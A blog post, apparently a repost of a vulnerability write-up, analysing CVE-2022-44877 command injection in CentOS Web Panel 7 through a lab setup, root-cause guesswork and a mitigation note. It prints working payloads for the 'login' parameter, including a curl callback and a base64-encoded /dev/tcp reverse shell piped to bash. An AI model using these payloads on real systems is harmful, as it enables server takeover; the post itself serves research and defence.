{"id":61239,"date":"2023-01-27T07:04:17","date_gmt":"2023-01-26T23:04:17","guid":{"rendered":"https:\/\/version-2.com\/?p=61239"},"modified":"2024-09-13T16:31:48","modified_gmt":"2024-09-13T08:31:48","slug":"unauthenticated-rce-in-centos-control-web-panel-7-cwp-cve-2022-44877","status":"publish","type":"post","link":"https:\/\/version-2.com\/zh\/2023\/01\/unauthenticated-rce-in-centos-control-web-panel-7-cwp-cve-2022-44877\/","title":{"rendered":"Unauthenticated RCE in Centos Control Web Panel 7 (CWP) -\u200aCVE-2022\u201344877"},"content":{"rendered":"\t\t<div data-elementor-type=\"wp-post\" data-elementor-id=\"61239\" class=\"elementor elementor-61239\">\n\t\t\t\t\t\t<section class=\"elementor-section elementor-top-section elementor-element elementor-element-4da8c5f9 elementor-section-boxed elementor-section-height-default elementor-section-height-default\" data-id=\"4da8c5f9\" data-element_type=\"section\" data-e-type=\"section\" data-settings=\"{&quot;jet_parallax_layout_list&quot;:[{&quot;jet_parallax_layout_image&quot;:{&quot;url&quot;:&quot;&quot;,&quot;id&quot;:&quot;&quot;,&quot;size&quot;:&quot;&quot;},&quot;_id&quot;:&quot;decf9c3&quot;,&quot;jet_parallax_layout_image_tablet&quot;:{&quot;url&quot;:&quot;&quot;,&quot;id&quot;:&quot;&quot;,&quot;size&quot;:&quot;&quot;},&quot;jet_parallax_layout_image_mobile&quot;:{&quot;url&quot;:&quot;&quot;,&quot;id&quot;:&quot;&quot;,&quot;size&quot;:&quot;&quot;},&quot;jet_parallax_layout_speed&quot;:{&quot;unit&quot;:&quot;%&quot;,&quot;size&quot;:50,&quot;sizes&quot;:[]},&quot;jet_parallax_layout_type&quot;:&quot;scroll&quot;,&quot;jet_parallax_layout_direction&quot;:&quot;1&quot;,&quot;jet_parallax_layout_fx_direction&quot;:null,&quot;jet_parallax_layout_z_index&quot;:&quot;&quot;,&quot;jet_parallax_layout_bg_x&quot;:50,&quot;jet_parallax_layout_bg_x_tablet&quot;:&quot;&quot;,&quot;jet_parallax_layout_bg_x_mobile&quot;:&quot;&quot;,&quot;jet_parallax_layout_bg_y&quot;:50,&quot;jet_parallax_layout_bg_y_tablet&quot;:&quot;&quot;,&quot;jet_parallax_layout_bg_y_mobile&quot;:&quot;&quot;,&quot;jet_parallax_layout_bg_size&quot;:&quot;auto&quot;,&quot;jet_parallax_layout_bg_size_tablet&quot;:&quot;&quot;,&quot;jet_parallax_layout_bg_size_mobile&quot;:&quot;&quot;,&quot;jet_parallax_layout_animation_prop&quot;:&quot;transform&quot;,&quot;jet_parallax_layout_on&quot;:[&quot;desktop&quot;,&quot;tablet&quot;]}]}\">\n\t\t\t\t\t\t<div class=\"elementor-container elementor-column-gap-default\">\n\t\t\t\t\t<div class=\"elementor-column elementor-col-100 elementor-top-column elementor-element elementor-element-133ba185\" data-id=\"133ba185\" data-element_type=\"column\" data-e-type=\"column\">\n\t\t\t<div class=\"elementor-widget-wrap elementor-element-populated\">\n\t\t\t\t\t\t<div class=\"elementor-element elementor-element-fc2da8d post-content elementor-widget elementor-widget-text-editor\" data-id=\"fc2da8d\" data-element_type=\"widget\" data-e-type=\"widget\" data-widget_type=\"text-editor.default\">\n\t\t\t\t<div class=\"elementor-widget-container\">\n\t\t\t\t\t\t\t\t\t<p align=\"center\"><img decoding=\"async\" class=\"head-img\" src=\"https:\/\/ik.imagekit.io\/14sfaswy6hrz\/blog-posts\/images\/cldd2rhfe01680jp8hul01ttb.png\" alt=\"\" ><\/p>\n\n<h3>Introduction<\/h3>\n<p>Unauthenticated RCE in Centos Web Panel 7\u200a\u2014\u200aCWP 7 has been found and registered as CVE-2022\u201344877.<\/p><p>Version affected <code>Centos Web Panel 7 - &lt; 0.9.8.1147<\/code><\/p>\n<p>This is one of the CVEs of the month and based on Greynoise (Check it <a target=\"_blank\" rel=\"noopener noreferrer nofollow\" href=\"https:\/\/viz.greynoise.io\/tag\/centos-web-panel-rce-cve-2022-44877-attempt?days=30\">here<\/a>) there are 6 unique IPs attempted to exploit this CVE.<\/p>\n<p align=\"center\"><img decoding=\"async\" src=\"https:\/\/cdn-images-1.medium.com\/max\/800\/1*kjYS6n8oVFp007KT0rarvA.png\" alt=\"https:\/\/cdn-images-1.medium.com\/max\/800\/1*kjYS6n8oVFp007KT0rarvA.png\"><\/p>\n<p>Based on Shodan search (check it <a target=\"_blank\" rel=\"noopener noreferrer nofollow\" href=\"https:\/\/www.shodan.io\/search?query=cwpsrv+%2B+http.status%3A200\">here<\/a>) CWP is running on 453,848 servers<\/p>\n<p align=\"center\"><img decoding=\"async\" src=\"https:\/\/cdn-images-1.medium.com\/max\/800\/1*CGjO4kehKdauxOed8hGxMA.png\" alt=\"https:\/\/cdn-images-1.medium.com\/max\/800\/1*CGjO4kehKdauxOed8hGxMA.png\"><\/p>\n<h3>Build the&nbsp;lab<\/h3>\n<p><strong>Install the system<\/strong><\/p>\n<ul><li>Setup CentOS 7<\/li><li>Install wget <code>sudo yum -y install wget<\/code><\/li><li>Update the system <code>sudo yum -y update<\/code><\/li><li>Reboot<\/li><\/ul>\n<p><strong>Install CWP<\/strong><\/p>\n<p>Follow these commands:<\/p><ul><li><code>sudo su<\/code><\/li><li><code>cd \/usr\/local\/src<\/code><\/li><li><code>wget http:\/\/centos-webpanel.com\/cwp-el7-latest<\/code><\/li><li><code>sh cwp-el7-latest<\/code><\/li><li>After the installation is done reboot the system<\/li><\/ul>\n<p><strong>Downgrade CWP to the vulnerable version<\/strong><\/p>\n<p>Follow these commands:<\/p><ul><li><code>cd \/usr\/local\/cwpsrv\/htdocs<\/code><\/li><li><code>chattr -i -R \/usr\/local\/cwpsrv\/htdocs<\/code><\/li><li><code>wget http:\/\/static.cdn-cwp.com\/files\/cwp\/el7\/cwp-el7-0.9.8.1146.zip<\/code><\/li><li><code>unzip -o -q cwp-el7-0.9.8.1146.zip<\/code><\/li><li><code>rm -f cwp-el7-0.9.8.1146.zip<\/code><\/li><li>Reboot the system<\/li><\/ul>\n<p><strong>Login to CWP<\/strong><\/p>\n<ul><li>Open the link in the browser:<a target=\"_blank\" rel=\"noopener noreferrer nofollow\" href=\"http:\/\/IP:2030\/\">http:\/\/IP:2030\/<\/a><\/li><\/ul>\n<p align=\"center\"><img decoding=\"async\" src=\"https:\/\/cdn-images-1.medium.com\/max\/800\/1*ZMsLy8ArzSoKnYwtGxdVfg.png\" alt=\"https:\/\/cdn-images-1.medium.com\/max\/800\/1*ZMsLy8ArzSoKnYwtGxdVfg.png\"><\/p>\n<ul><li>The username and password are the root user and the password of the root.<\/li><\/ul>\n<p align=\"center\"><img decoding=\"async\" src=\"https:\/\/cdn-images-1.medium.com\/max\/800\/1*khtCbAQFBYWWNnw54brvKQ.png\" alt=\"https:\/\/cdn-images-1.medium.com\/max\/800\/1*khtCbAQFBYWWNnw54brvKQ.png\"><\/p>\n<h4>The vulnerability<\/h4>\n<p>The vulnerability existed in \u201clogin\u201d parameter in the login page<\/p>\n<p align=\"center\"><img decoding=\"async\" src=\"https:\/\/cdn-images-1.medium.com\/max\/800\/1*RkOz-mwMTcKB-xGxBf-LvQ.png\"><\/p>\n<ul><li>Capture the login request<\/li><\/ul>\n<p align=\"center\"><img decoding=\"async\" src=\"https:\/\/cdn-images-1.medium.com\/max\/800\/1*a4bHEKS-ApbCQB6l_1pFDg.png\"><\/p>\n<ul><li>Now, let\u2019s make a simple test by trying to curl website<\/li><li>Run http simple server <code>python3 -m http.server<\/code><\/li><\/ul>\n<p align=\"center\"><img decoding=\"async\" src=\"https:\/\/cdn-images-1.medium.com\/max\/800\/1*8HsFn-mV4z9QIMFap2CYXQ.png\"><\/p>\n<ul><li>replace \u201clogin=logout\u201d with <code>login=$(curl${IFS}192.168.1.105:8000)<\/code><\/li><\/ul>\n<p align=\"center\"><img decoding=\"async\" src=\"https:\/\/cdn-images-1.medium.com\/max\/800\/1*pR6Ks28cBIc3gW_iBYG1pw.png\"><\/p>\n<p>and here is the request:<\/p>\n<p align=\"center\"><img decoding=\"async\" src=\"https:\/\/cdn-images-1.medium.com\/max\/800\/1*4LxHWWb8U0UY-vXveW_lSw.png\"><\/p>\n<p>While I\u2019m reproducing this vulnerability I noticed something with the authentication.<\/p>\n<p>This is supposed to be \u201cunauthenticated RCE\u201d, but I found out that you still need to know the correct username.<\/p>\n<h4><strong>Here are some test&nbsp;cases:<\/strong><\/h4>\n<ul><li>Send the payload with the <strong>incorrect <\/strong>username &amp; <strong>incorrect <\/strong>password \u274c<\/li><li>Send the payload with the <strong>incorrect <\/strong>username &amp; <strong>correct <\/strong>password \u274c<\/li><li>Send the payload with the <strong>correct <\/strong>username &amp; <strong>incorrect <\/strong>password \u2705<\/li><\/ul>\n<p>Before we go to how to get a reverse shell, let\u2019s explain the payload&nbsp;<\/p><p>Let\u2019s take this payload as an example:<\/p>\n<p><code>$(curl${IFS}192.168.1.105:8000)<\/code><\/p>\n<ul><li>The <code>IFS<\/code> variable is being used here in a way that it&#8217;s being used as a separator between&nbsp;<\/li><li>the <code>curl<\/code> command and the URL, which is &#8220;192.168.1.105:8000&#8221;.<\/li><li>The <code>$()<\/code> operator is used to execute the command inside the parentheses and returns the output. This means that the command is making a request to the specified IP address and port number using, and the output of the request will be returned and can be used in the following commands or assigned to a variable.<\/li><\/ul>\n<h4>The RCE<\/h4>\n<ul><li>Here is the reverse shell:<\/li><\/ul><p><code>sh -i &gt;&amp; \/dev\/tcp\/192.168.1.105\/9001 0&gt;&amp;1<\/code><\/p><ul><li>Encode the reverse shell to Base64<\/li><\/ul><p><code>c2ggLWkgPiYgL2Rldi90Y3AvMTkyLjE2OC4xLjEwNS85MDAxIDA+JjE=<\/code><\/p><ul><li>The final format of the payload:<\/li><\/ul><p><code>$(echo${IFS}c2ggLWkgPiYgL2Rldi90Y3AvMTkyLjE2OC4xLjEwNS85MDAxIDA+JjE=${IFS}|${IFS}base64${IFS}-d${IFS}|${IFS}bash)<\/code><\/p><ul><li>Start the listener<\/li><li>Send the payload<\/li><\/ul>\n<p align=\"center\"><img decoding=\"async\" src=\"https:\/\/cdn-images-1.medium.com\/max\/800\/1*QMO4Hr9vSlebaZ28urgECw.png\"><\/p>\n<ul><li>Receive the connection<\/li><\/ul>\n<p align=\"center\"><img decoding=\"async\" src=\"https:\/\/cdn-images-1.medium.com\/max\/800\/1*yNxasqNWMnG5t1TXp8ybvw.png\"><\/p>\n<ul><li>Let\u2019s see where the execution happened&nbsp;<\/li><\/ul>\n<p align=\"center\"><img decoding=\"async\" src=\"https:\/\/cdn-images-1.medium.com\/max\/800\/1*X5Ndw0gGv6oKChPxVHPqJA.png\"><\/p>\n<p>Now we know that the login page under admin it\u2019s the vulnerable one.Let\u2019s move to the static analysis<\/p><h3><\/h3><h3>Static Analysis<\/h3>\n<p>Open the source code we downloaded from here:<\/p><p><code>http:\/\/static.cdn-cwp.com\/files\/cwp\/el7\/cwp-el7-0.9.8.1146.zip<\/code><\/p><p>Unfortunately, this is all that we got.<\/p>\n<p align=\"center\"><img decoding=\"async\" src=\"https:\/\/cdn-images-1.medium.com\/max\/800\/1*OP88AzSATDySDfGbMAIhww.png\"><\/p>\n<p>The source code is encoded with ionCube, it\u2019s easy to decode it or reverse engineer it, and it\u2019s illegal.<\/p>\n<p align=\"center\"><img decoding=\"async\" src=\"https:\/\/cdn-images-1.medium.com\/max\/800\/1*LMLsdhp_DwZ1j6-FO9s0_Q.png\"><\/p>\n<p>We only have one line script here which checks if the IonCube Loader extension is loaded and if not, it attempts to load it dynamically.<\/p>\n<p>Since we don\u2019t have the source code I wanted to get more insight into what the code would look like.<\/p><p>So I started to run more analysis trying to understand the code in the back-end so I can simulate it:<\/p>\n<ul><li>I know that any command execution results getting stored in the logs<\/li><\/ul><p>The login errors getting recorded in<code>\/var\/log\/cwp_client_login.log<\/code>&nbsp;<\/p>\n<p align=\"center\"><img decoding=\"async\" src=\"https:\/\/cdn-images-1.medium.com\/max\/800\/1*S0sPuLpwbiTDpg00K8qf5Q.png\"><\/p>\n<p>now <code>cat cwp_client_login.log<\/code>&nbsp;<\/p>\n<p align=\"center\"><img decoding=\"async\" src=\"https:\/\/cdn-images-1.medium.com\/max\/800\/1*0xd5f8M5M-RuFoZmB7Mn9g.png\"><\/p>\n<p>While I\u2019m doing this I noticed the following:<\/p>\n<p>As we mentioned before, the user should be correct and we are assuming that we don\u2019t know the password.Since this is failed login, the website will redirect the user to log in again.<\/p>\n<p>in this case, the command will not execute \u274c<\/p>\n<p align=\"center\"><img decoding=\"async\" class=\"lazyload\" src=\"https:\/\/raw.githubusercontent.com\/mhzcyber\/CVE-Analysis\/main\/CVE-2022%E2%80%9344877\/login%20failed%20-%20no%20command%20execution.gif\"><\/p>\n<p>in case we are using Brupsuite, once we send the request the command gets executed \u2705<\/p>\n<p align=\"center\"><img decoding=\"async\" src=\"https:\/\/raw.githubusercontent.com\/mhzcyber\/CVE-Analysis\/main\/CVE-2022%E2%80%9344877\/execute%20command%20-%20burpsuite.gif\"><\/p>\n<p>Since the results of the executed commands getting recorded in the log files, I want to analyze the logs.<\/p>\n<pre><code>2023-01-25 20:44:27 root Failed Login from: 192.168.1.107 on: 'https:\/\/localhost:2031\/login\/index.php?login=root'<\/code><\/pre>\n<ul><li>The \u201c2023\u201301\u201325 20:44:27\u201d date and time get changed every time, so this is a variable.<\/li><li>The \u201croot\u201d is the user<\/li><li>\u201cFailed Login from:\u201d This is a message and it\u2019s the same every time<\/li><li>The \u201c192.168.1.107\u201d is the IP of the user who is trying to log in<\/p><p><a target=\"_blank\" rel=\"noopener noreferrer nofollow\" href=\"https:\/\/localhost:2031\/login\/index.php?login=root%27\">\u2018<\/a><a target=\"_blank\" rel=\"noopener noreferrer nofollow\" href=\"https:\/\/localhost:2031\/login\/index.php?login=root\">https:\/\/localhost:2031\/login\/index.php?login=root<\/a><a target=\"_blank\" rel=\"noopener noreferrer nofollow\" href=\"https:\/\/localhost:2031\/login\/index.php?login=root%27\">&#8216;<\/a> I\u2019m not sure why it\u2019s \u201c<a target=\"_blank\" rel=\"noopener noreferrer nofollow\" href=\"http:\/\/localhost\">localhost<\/a>\u201d here, however, what we inject after \u201clogin=\u201d it\u2019s getting executed and this changes every time so it\u2019s a variable.<\/li><\/ul>\n<pre><code>$error = $DATE.$USER.\"Failed Login form:\".$URL<\/code><\/pre>\n<h4><strong>The facts we gathered:<\/strong><\/h4>\n<ul><li>There is a check, if the user is not correct the execution doesn\u2019t work.<\/li><li>When the login error happens the URL with the parameter getting recorded in cwp_client_login.log<\/li><li>The date changes, the user (I\u2019m not sure about it, but it should be a variable as well), the failed login statement, and the user IP.<\/li><\/ul>\n<p>This brings us to a very interesting conclusion, only IF there is a login error where the user is correct, the URL along with the parameter will be stored in the log file.<\/p><p>we can understand that there is something wrong that happened when the whole URL gets passed and not enough sanitization.&nbsp;<\/p><p>After more reading about this specific CVE, I found that the URL is getting passed to some execution function and that\u2019s how the false attempts are logged<\/p>\n<p>The mentioned technique in the blogs are as follows:<\/p>\n<pre><code>echo \"incorrect_enter, IP address, HTTP_request_URI\" &gt;&gt; .\/wring_entry.log<\/code><\/pre>\n<p>After I made some tests, I found that unless we passed the payload in this specific way such as:<\/p>\n<ul><li>$(command)<\/li><li><code>` command `<\/code><\/li><\/ul>\n<p>it won\u2019t execute, so that means there is something else. more searching, and asking questions. I was looking for functions in PHP I may use to sanitize a parameter against command injection. because if they are passing anything to execute a command they are supposed to sanitize the passed parameters first.<\/p>\n<p>I found those two:<\/p><ul><li><code>escapeshellarg()<\/code>: This function is used to escape a string to be used as a command-line argument in a shell command. It adds single quotes around the string and escapes any existing single quotes within the string, ensuring that the string is treated as a single argument and is protected against injection attacks.<\/li><\/ul>\n<ul><li><code>escapeshellcmd()<\/code>: This function is used to escape a string that is used as a shell command. It escapes any characters that may be used to inject additional commands into the shell command.<\/li><\/ul>\n<p>I also found this resource:<\/p>\n<p><a target=\"_blank\" rel=\"noopener noreferrer nofollow\" href=\"https:\/\/github.com\/kacperszurek\/exploits\/blob\/master\/GitList\/exploit-bypass-php-escapeshellarg-escapeshellcmd.md#what-escapeshellarg-and-escapeshellcmd-really-do\">https:\/\/github.com\/kacperszurek\/exploits\/blob\/master\/GitList\/exploit-bypass-php-escapeshellarg-escapeshellcmd.md#what-escapeshellarg-and-escapeshellcmd-really-do<\/a><\/p>\n<h4>Simulating the back-end&nbsp;code<\/h4>\n<p>This is my final conclusion of how the code could look like in the backend:<\/p>\n<pre><code>&lt;?php\nif(isset($_POST['login'])) {\n    $date_time = date(\"Y-m-d H:i:s\");\n    $username = $_POST['username'];\n    $password = $_POST['password'];\n    $url = $_SERVER['REQUEST_URI'];\n    $remote_ip = $_SERVER[\"REMOTE_ADDR\"];\n    if($username != \"root\"){\n        echo \"You are not authorized to login\";\n    }\n    else {\n        if($username == \"root\") {\n            $escapedUrl = escapeshellarg($url);\n            system(\"echo \\\"\" . $date_time . \" \" . $username . \" Successful Login from: \" . $remote_ip . \" on: \" . $escapedUrl . \"\\\" &gt;&gt; cwp_client_login.log\");\n            echo \"Welcome root\";\n        }\n        else {\n            echo \"Wrong Password or Username!\";\n        }\n    }\n}\n?&gt;\n\n&lt;form action=\"\" method=\"post\"&gt;\n    &lt;label for=\"username\"&gt;Username:&lt;\/label&gt;\n    &lt;input type=\"text\" name=\"username\" required&gt;\n    &lt;br&gt;\n    &lt;label for=\"password\"&gt;Password:&lt;\/label&gt;\n    &lt;input type=\"password\" name=\"password\" required&gt;\n    &lt;br&gt;\n    &lt;input type=\"submit\" name=\"login\" value=\"Login\"&gt;\n&lt;\/form&gt;<\/code><\/pre>\n<p>Run the code to test it<\/p><p><code>php -S ip:port test.php<\/code>&nbsp;<\/p>\n<ul><li>Send the request<\/li><\/ul>\n<p align=\"center\"><img decoding=\"async\" src=\"https:\/\/cdn-images-1.medium.com\/max\/800\/1*kYFDXqpUAgY-8wlOKTcuHA.png\"><\/p>\n<p align=\"center\"><img decoding=\"async\" src=\"https:\/\/cdn-images-1.medium.com\/max\/800\/1*JpcxsgBAnufYGXnscs4GkQ.png\"><\/p>\n<p align=\"center\"><img decoding=\"async\" src=\"https:\/\/cdn-images-1.medium.com\/max\/800\/1*z4x8BULP3LtCx_kkZU96cA.png\"><\/p>\n\n<h3>Mitigation<\/h3>\n<p>Upgrade CWP to the latest version.<\/p>\n<h3>Final thoughts<\/h3>\n<p>This is a very simple and easy vulnerability to exploit and that is what makes it more dangerous, however, it\u2019s always interesting and fun to dive deep into the source code and understand the root cause of the vulnerability.<\/p><p>In our case since the code is encoded and it\u2019s illegal to decode it, I tried to give more insight into how this vulnerability might be happening in the backend therefore I needed to conduct a lot more analysis and tests, also go through tons of researching and asking questions.<\/p>\n<h3>Resources:<\/h3>\n<ul><li><a target=\"_blank\" rel=\"noopener noreferrer nofollow\" href=\"https:\/\/socradar.io\/threat-actors-exploit-cve-2022-44877-rce-vulnerability-in-centos-web-panel-cwp\/\">https:\/\/socradar.io\/threat-actors-exploit-cve-2022-44877-rce-vulnerability-in-centos-web-panel-cwp\/<\/a><\/li><li><a target=\"_blank\" rel=\"noopener noreferrer nofollow\" href=\"https:\/\/www.rezilion.com\/blog\/control-web-panel-vulnerability-cve-2022-44877-actively-exploited-in-the-wild\/\">https:\/\/www.rezilion.com\/blog\/control-web-panel-vulnerability-cve-2022-44877-actively-exploited-in-the-wild\/<\/a><\/li><li><a target=\"_blank\" rel=\"noopener noreferrer nofollow\" href=\"https:\/\/github.com\/numanturle\/CVE-2022-44877\">https:\/\/github.com\/numanturle\/CVE-2022-44877<\/a><\/li><li><a target=\"_blank\" rel=\"noopener noreferrer nofollow\" href=\"https:\/\/packetstormsecurity.com\/files\/170388\/Control-Web-Panel-7-Remote-Code-Execution.html\">https:\/\/packetstormsecurity.com\/files\/170388\/Control-Web-Panel-7-Remote-Code-Execution.html<\/a><\/li><\/ul>\n<p>#<strong>CVE-2022-44877 #CWP #RCE<\/strong><\/p>\t\t\t\t\t\t\t\t<\/div>\n\t\t\t\t<\/div>\n\t\t\t\t<div class=\"elementor-element elementor-element-8085a61 post-content elementor-widget elementor-widget-shortcode\" data-id=\"8085a61\" data-element_type=\"widget\" data-e-type=\"widget\" data-widget_type=\"shortcode.default\">\n\t\t\t\t<div class=\"elementor-widget-container\">\n\t\t\t\t\t\t\t<div class=\"elementor-shortcode\">\t\t<div data-elementor-type=\"page\" data-elementor-id=\"18103\" class=\"elementor elementor-18103\">\n\t\t\t\t\t\t<section class=\"elementor-section elementor-top-section elementor-element elementor-element-748947f elementor-section-full_width elementor-section-height-default elementor-section-height-default\" data-id=\"748947f\" data-element_type=\"section\" data-e-type=\"section\" data-settings=\"{&quot;jet_parallax_layout_list&quot;:[{&quot;jet_parallax_layout_image&quot;:{&quot;url&quot;:&quot;&quot;,&quot;id&quot;:&quot;&quot;,&quot;size&quot;:&quot;&quot;},&quot;_id&quot;:&quot;c4f773e&quot;,&quot;jet_parallax_layout_image_tablet&quot;:{&quot;url&quot;:&quot;&quot;,&quot;id&quot;:&quot;&quot;,&quot;size&quot;:&quot;&quot;},&quot;jet_parallax_layout_image_mobile&quot;:{&quot;url&quot;:&quot;&quot;,&quot;id&quot;:&quot;&quot;,&quot;size&quot;:&quot;&quot;},&quot;jet_parallax_layout_speed&quot;:{&quot;unit&quot;:&quot;%&quot;,&quot;size&quot;:50,&quot;sizes&quot;:[]},&quot;jet_parallax_layout_type&quot;:&quot;scroll&quot;,&quot;jet_parallax_layout_direction&quot;:&quot;1&quot;,&quot;jet_parallax_layout_fx_direction&quot;:null,&quot;jet_parallax_layout_z_index&quot;:&quot;&quot;,&quot;jet_parallax_layout_bg_x&quot;:50,&quot;jet_parallax_layout_bg_x_tablet&quot;:&quot;&quot;,&quot;jet_parallax_layout_bg_x_mobile&quot;:&quot;&quot;,&quot;jet_parallax_layout_bg_y&quot;:50,&quot;jet_parallax_layout_bg_y_tablet&quot;:&quot;&quot;,&quot;jet_parallax_layout_bg_y_mobile&quot;:&quot;&quot;,&quot;jet_parallax_layout_bg_size&quot;:&quot;auto&quot;,&quot;jet_parallax_layout_bg_size_tablet&quot;:&quot;&quot;,&quot;jet_parallax_layout_bg_size_mobile&quot;:&quot;&quot;,&quot;jet_parallax_layout_animation_prop&quot;:&quot;transform&quot;,&quot;jet_parallax_layout_on&quot;:[&quot;desktop&quot;,&quot;tablet&quot;]}]}\">\n\t\t\t\t\t\t<div class=\"elementor-container elementor-column-gap-default\">\n\t\t\t\t\t<div class=\"elementor-column elementor-col-100 elementor-top-column elementor-element elementor-element-7995c19\" data-id=\"7995c19\" data-element_type=\"column\" data-e-type=\"column\">\n\t\t\t<div class=\"elementor-widget-wrap elementor-element-populated\">\n\t\t\t\t\t\t<div class=\"elementor-element elementor-element-a437045 elementor-widget elementor-widget-image-box\" data-id=\"a437045\" data-element_type=\"widget\" data-e-type=\"widget\" data-widget_type=\"image-box.default\">\n\t\t\t\t<div class=\"elementor-widget-container\">\n\t\t\t\t\t<div class=\"elementor-image-box-wrapper\"><div class=\"elementor-image-box-content\"><h3 class=\"elementor-image-box-title\">About Version 2 Digital<\/h3><p class=\"elementor-image-box-description\">Version 2 Digital is one of the most dynamic IT companies in Asia. The company distributes a wide range of IT products across various areas including cyber security, cloud, data protection, end points, infrastructures, system monitoring, storage, networking, business productivity and communication products.\n<br><br>\nThrough an extensive network of channels, point of sales, resellers, and partnership companies, Version 2 offers quality products and services which are highly acclaimed in the market. Its customers cover a wide spectrum which include Global 1000 enterprises, regional listed companies, different vertical industries, public utilities, Government, a vast number of successful SMEs, and consumers in various Asian cities.<\/p><\/div><\/div>\t\t\t\t<\/div>\n\t\t\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t<\/section>\n\t\t\t\t<\/div>\n\t\t\n\t\t<div data-elementor-type=\"page\" data-elementor-id=\"39690\" class=\"elementor elementor-39690\">\n\t\t\t\t\t\t<section class=\"elementor-section elementor-top-section elementor-element elementor-element-748947f elementor-section-full_width elementor-section-height-default elementor-section-height-default\" data-id=\"748947f\" data-element_type=\"section\" data-e-type=\"section\" data-settings=\"{&quot;jet_parallax_layout_list&quot;:[{&quot;jet_parallax_layout_image&quot;:{&quot;url&quot;:&quot;&quot;,&quot;id&quot;:&quot;&quot;,&quot;size&quot;:&quot;&quot;},&quot;_id&quot;:&quot;c4f773e&quot;,&quot;jet_parallax_layout_image_tablet&quot;:{&quot;url&quot;:&quot;&quot;,&quot;id&quot;:&quot;&quot;,&quot;size&quot;:&quot;&quot;},&quot;jet_parallax_layout_image_mobile&quot;:{&quot;url&quot;:&quot;&quot;,&quot;id&quot;:&quot;&quot;,&quot;size&quot;:&quot;&quot;},&quot;jet_parallax_layout_speed&quot;:{&quot;unit&quot;:&quot;%&quot;,&quot;size&quot;:50,&quot;sizes&quot;:[]},&quot;jet_parallax_layout_type&quot;:&quot;scroll&quot;,&quot;jet_parallax_layout_direction&quot;:&quot;1&quot;,&quot;jet_parallax_layout_fx_direction&quot;:null,&quot;jet_parallax_layout_z_index&quot;:&quot;&quot;,&quot;jet_parallax_layout_bg_x&quot;:50,&quot;jet_parallax_layout_bg_x_tablet&quot;:&quot;&quot;,&quot;jet_parallax_layout_bg_x_mobile&quot;:&quot;&quot;,&quot;jet_parallax_layout_bg_y&quot;:50,&quot;jet_parallax_layout_bg_y_tablet&quot;:&quot;&quot;,&quot;jet_parallax_layout_bg_y_mobile&quot;:&quot;&quot;,&quot;jet_parallax_layout_bg_size&quot;:&quot;auto&quot;,&quot;jet_parallax_layout_bg_size_tablet&quot;:&quot;&quot;,&quot;jet_parallax_layout_bg_size_mobile&quot;:&quot;&quot;,&quot;jet_parallax_layout_animation_prop&quot;:&quot;transform&quot;,&quot;jet_parallax_layout_on&quot;:[&quot;desktop&quot;,&quot;tablet&quot;]}]}\">\n\t\t\t\t\t\t<div class=\"elementor-container elementor-column-gap-default\">\n\t\t\t\t\t<div class=\"elementor-column elementor-col-100 elementor-top-column elementor-element elementor-element-7995c19\" data-id=\"7995c19\" data-element_type=\"column\" data-e-type=\"column\">\n\t\t\t<div class=\"elementor-widget-wrap elementor-element-populated\">\n\t\t\t\t\t\t<div class=\"elementor-element elementor-element-ff2a228 elementor-widget elementor-widget-text-editor\" data-id=\"ff2a228\" data-element_type=\"widget\" data-e-type=\"widget\" data-widget_type=\"text-editor.default\">\n\t\t\t\t<div class=\"elementor-widget-container\">\n\t\t\t\t\t\t\t\t\t<p><\/p>\n<p><b>About VRX<\/b><br><b>VRX&nbsp;<\/b>is a consolidated vulnerability management platform that protects assets in real time. Its rich, integrated features efficiently pinpoint and remediate the largest risks to your cyber infrastructure. Resolve the most pressing threats with efficient automation features and precise contextual analysis.<\/p>\t\t\t\t\t\t\t\t<\/div>\n\t\t\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t<\/section>\n\t\t\t\t<\/div>\n\t\t<\/div>\n\t\t\t\t\t\t<\/div>\n\t\t\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t<\/section>\n\t\t\t\t<\/div>\n\t\t","protected":false},"excerpt":{"rendered":"<p>Introduction Unauthenticated RCE in Centos Web Panel 7\u200a [&hellip;]<\/p>\n","protected":false},"author":148637484,"featured_media":0,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"_acf_changed":false,"_jetpack_memberships_contains_paid_content":false,"footnotes":""},"categories":[476,1075,61],"tags":[477,1076],"class_list":["post-61239","post","type-post","status-publish","format-standard","hentry","category-vrx","category-year2023","category-press-release","tag-vrx","tag-1076"],"acf":[],"yoast_head":"<!-- This site is optimized with the Yoast SEO plugin v27.4 - https:\/\/yoast.com\/product\/yoast-seo-wordpress\/ -->\n<title>Unauthenticated RCE in Centos Control Web Panel 7 (CWP) -\u200aCVE-2022\u201344877 - Version 2<\/title>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/www.vicarius.io\/blog\/unauthenticated-rce-in-centos-control-web-panel-7-cwp-cve-2022-44877\" \/>\n<meta property=\"og:locale\" content=\"zh_HK\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"Unauthenticated RCE in Centos Control Web Panel 7 (CWP) -\u200aCVE-2022\u201344877 - Version 2\" \/>\n<meta property=\"og:description\" content=\"Introduction Unauthenticated RCE in Centos Web Panel 7\u200a [&hellip;]\" \/>\n<meta property=\"og:url\" content=\"https:\/\/www.vicarius.io\/blog\/unauthenticated-rce-in-centos-control-web-panel-7-cwp-cve-2022-44877\" \/>\n<meta property=\"og:site_name\" content=\"Version 2\" \/>\n<meta property=\"article:published_time\" content=\"2023-01-26T23:04:17+00:00\" \/>\n<meta property=\"article:modified_time\" content=\"2024-09-13T08:31:48+00:00\" \/>\n<meta property=\"og:image\" content=\"https:\/\/ik.imagekit.io\/14sfaswy6hrz\/blog-posts\/images\/cldd2rhfe01680jp8hul01ttb.png\" \/>\n<meta name=\"author\" content=\"versionpan\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<meta name=\"twitter:label1\" content=\"\u4f5c\u8005\" \/>\n\t<meta name=\"twitter:data1\" content=\"versionpan\" \/>\n\t<meta name=\"twitter:label2\" content=\"\u9810\u8a08\u95b1\u8b80\u6642\u9593\" \/>\n\t<meta name=\"twitter:data2\" content=\"10 \u5206\u9418\" \/>\n<script type=\"application\/ld+json\" 